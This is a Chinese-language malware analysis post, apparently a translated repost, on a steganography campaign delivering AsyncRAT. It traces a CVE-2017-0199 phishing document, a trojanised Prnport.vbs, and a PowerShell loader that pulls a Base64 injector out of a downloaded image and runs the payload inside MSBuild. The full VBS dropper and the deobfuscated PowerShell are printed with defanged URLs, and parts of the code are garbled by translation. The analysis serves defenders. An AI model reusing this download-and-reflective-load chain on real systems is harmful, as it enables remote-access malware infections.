Stego-Campaign 传播 AsyncRAT

admin

144121
文章

118
评论

2025年5月27日09:34:00评论41 views字数 4811阅读16分2秒阅读模式

隐写术是指将恶意代码隐藏在看似无害的图像文件中。虽然这种技术在野外并不常见，但发现它总是令人兴奋的，而且它往往能揭示攻击者为传递有效载荷而采取的巧妙手段。

隐写术活动流程

初次感染

初始感染通常始于一封钓鱼邮件，其中包含一个旨在利用漏洞的恶意 Microsoft Office 文档CVE-2017–0199。该漏洞允许远程代码执行 (RCE)，由Ryan Hanson于 2017 年 4 月首次报告给微软。当受害者打开该文档时，它会触发下载并执行远程脚本（通常是 HTA 文件），而无需任何进一步的交互。

在我们的示例中，HTA 脚本下载了木马副本Prnport.vbs，该副本在执行时将动态构建并执行 PowerShell 脚本以启动下一阶段。

CVE-2017–0199可以在MalwareBazaar上找到利用的样本。

Prnport.vbs是大多数 Windows 客户端和服务器版本中都包含的合法脚本。其目的是管理 TCP/IP 打印机端口及其配置。在我们的示例中，恶意代码被插入到 Prnport.vbs 脚本的开头，从而有效地将合法工具木马化。该工具执行后，会将 1-5 顺序的 PowerShell 命令拼凑在一起，然后WScript.exe执行。

Option  Explicit On  Error  Resume  Next ' Crear objeto shell Dim objShell Set objShell = CreateObject( "WScript.Shell" ) ' Dividir el comando en parts Dim cmd1, cmd2, cmd3, cmd4, cmd5, FinalCmd cmd1 = "$payloadURL = 'txt.100/etis[.]soedivtohenilnohctaw//:sptth';$finalPayloadURL = $payloadURL -replace '#', 't';" cmd2 = "$loaderURL = 'hxxps[://]1019[.]filemail[.]com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdr UqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1';" cmd3 = "$NET = 'N' + 'et'; $WEBCLIENT = 'WebC' + 'lient'; $netWebclientObject = 新对象系统.$NET.$WEBCLIENT;$hiddenLoader = $netWebclientObject.('Downl' + 'oadData')($loaderURL);" cmd4 = "$utf8hiddenLoader = [Text.Encoding]::UTF8.('GetS' + 'tring')($hiddenLoader);$startMarker = '<<BASE64_START>>';$endMarker = '<<BASE64_END>>';$base64start = $utf8hiddenLoader.('Ind' + 'exOf')($startMarker);$base64end = $utf8hiddenLoader.IndexOf($endMarker);" cmd5 = "$base64start -ge 0 -and $base64end -gt $base64start;$base64start += $startMarker.Length;$trimBase64 = $base64end - $base64start;$extractedBase64 = $utf8hiddenLoader.Substring($base64start, $trimBase64);$decodedLoader = [Convert]::('FromBas' + 'e64String')($extractedBase64);$loaderReflection = [Reflection.Assembly]::('Lo' + 'ad')($decodedLoader);$executeMethod = [dnlib.IO.Home].('GetM' + 'ethod')('VAI').('Inv' + 'oke')($null, [object[]] @($finalPayloadURL,'','','','MSBuild','','','','','','','','','',''))" ' 连接所有部分FinalCmd = "cmd /c powershell -Command """ & cmd1 & cmd2 & cmd3 & cmd4 & cmd5 & """" ' Ejecutar comando oculto objShell.Run FinalCmd, 0 , True ' Limpiar objeto Set objShell = Nothing

该恶意文件的完整版本Prnport.vbs可在我的GitHub和VirusTotal上找到。

WScript.exe 执行 PowerShell 代码

下面的 PowerShell 代码执行后，受害者将得到一个在看似合法的MSBuild进程下运行的有效载荷（在本例中为 AsyncRAT）。

## C2 hosting payload$payloadURL = 'txt.100/etis[.]soedivtohenilnohctaw[//:]spxxh';$finalPayloadURL = $payloadURL -replace '#', 't';## Injector.dll hidden in image$injectorURL = 'hxxps[://]1019[.]filemail[.]com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1';## Deobfuscating PowerShell download method$NET = 'N' + 'et'; $WEBCLIENT = 'WebC' + 'lient'; $netWebclientObject = New-Object System.$NET.$WEBCLIENT;$hiddenInjector = $netWebclientObject.('Downl' + 'oadData')($injectorURL);$utf8hiddenInjector = [Text.Encoding]::UTF8.('GetS' + 'tring')($hiddenInjector);## Base64 markers$startMarker = '<<BASE64_START>>';$endMarker = '<<BASE64_END>>';## Use Base64 markers to extract injector from image, then decode$base64start = $utf8hiddenInjector.('Ind' + 'exOf')($startMarker);$base64end = $utf8hiddenInjector.IndexOf($endMarker);$base64start -ge 0 -and $base64end -gt $base64start;$base64start += $startMarker.Length;$trimBase64 = $base64end - $base64start;$extractedBase64 = $utf8hiddenInjector.Substring($base64start, $trimBase64);$decodedInjector = [Convert]::('FromBas' + 'e64String')($extractedBase64);## Use reflection to load the injector$injectorReflection = [Reflection.Assembly]::('Lo' + 'ad')($decodedInjector);## Dynamically retrieve method 'VAI' and pass the payload URL in $finalPayloadURL $executeMethod = [dnlib.IO.Home].('GetM' + 'ethod')('VAI').('Inv' + 'oke')($null, [object[]] @($finalPayloadURL,'','','','MSBuild','','','','','','','','','',''))